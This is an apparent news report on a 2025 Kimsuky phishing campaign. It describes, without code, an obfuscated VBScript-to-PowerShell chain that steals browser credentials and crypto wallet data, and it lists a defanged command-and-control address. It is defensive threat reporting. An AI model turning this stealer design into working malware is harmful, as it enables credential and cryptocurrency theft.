A cyber-espionage group linked to North Korea, known as Kimsuky, has launched a new wave of phishing attacks combined with sophisticated malware infections, according to cybersecurity researchers. The group’s latest campaign was observed in March 2025 and targets government agencies, think tanks, and individuals involved in foreign policy and national security.
Kimsuky, an advanced persistent threat (APT) group, is known for its data-stealing operations. This time, it has upgraded its methods, using multi-stage attack chains designed to avoid detection while stealing sensitive information.
How the Attack Works
The attack starts when victims receive a ZIP file containing a malicious script. Once opened, this script begins a complex infection process.
The malware installs several hidden components that work together to:
- Keep the malware active on the system,
- Collect system details,
- Steal sensitive data and send it to servers controlled by the attackers.
Researchers from K7 Security Labs discovered the attack through shared indicators of compromise in cybersecurity communities. Their analysis revealed that Kimsuky has improved its methods to better avoid detection, extract data more efficiently, and specifically target cryptocurrency assets.
Technical Details of the Malware
The infection starts with a VBScript file that uses advanced techniques to hide its real purpose. Functions like chr() and CLng() are used to build malicious PowerShell commands in real-time, making the code harder to detect.
Once executed, the VBScript runs a PowerShell script that decodes and launches Base64-encoded malware hidden in log files. The PowerShell script collects the system’s BIOS serial number to create a unique ID for the infected machine. It also checks if the system is running in a virtual machine, a common environment used by security analysts, and stops execution if detected.
The decoded PowerShell script contains eleven specialized functions that:
- Steal browser data (logins, cookies, history),
- Target cryptocurrency wallets,
- Upload stolen data,
- Ensure the malware remains active through scheduled tasks.
Focus on Cryptocurrency Theft
The malware targets popular browsers like Edge, Chrome, Firefox, and Naver Whale. It extracts saved credentials, cookies, and browsing history. Additionally, it focuses on over 30 cryptocurrency wallet extensions, including MetaMask, Trust Wallet, and Tron.
For each wallet found, the malware tries to steal database files that may contain access keys and transaction records.
Data Exfiltration and Remote Access
After collecting the stolen data, the malware compresses everything into a ZIP file, renames it as “init.dat” to avoid suspicion, and uploads it to a command-and-control server at:
- http://srvdown[.]ddns[.]net/service3/
This server can also send further commands to the infected systems, giving attackers ongoing remote access.
Growing Cybersecurity Threat
Experts warn that this attack shows Kimsuky’s continued efforts to develop highly advanced malware. It poses serious risks to organizations and individuals holding cryptocurrency or sensitive information.
Security professionals are urged to:
- Use advanced threat detection systems,
- Train employees to recognize phishing emails, which are the main entry point for these attacks.
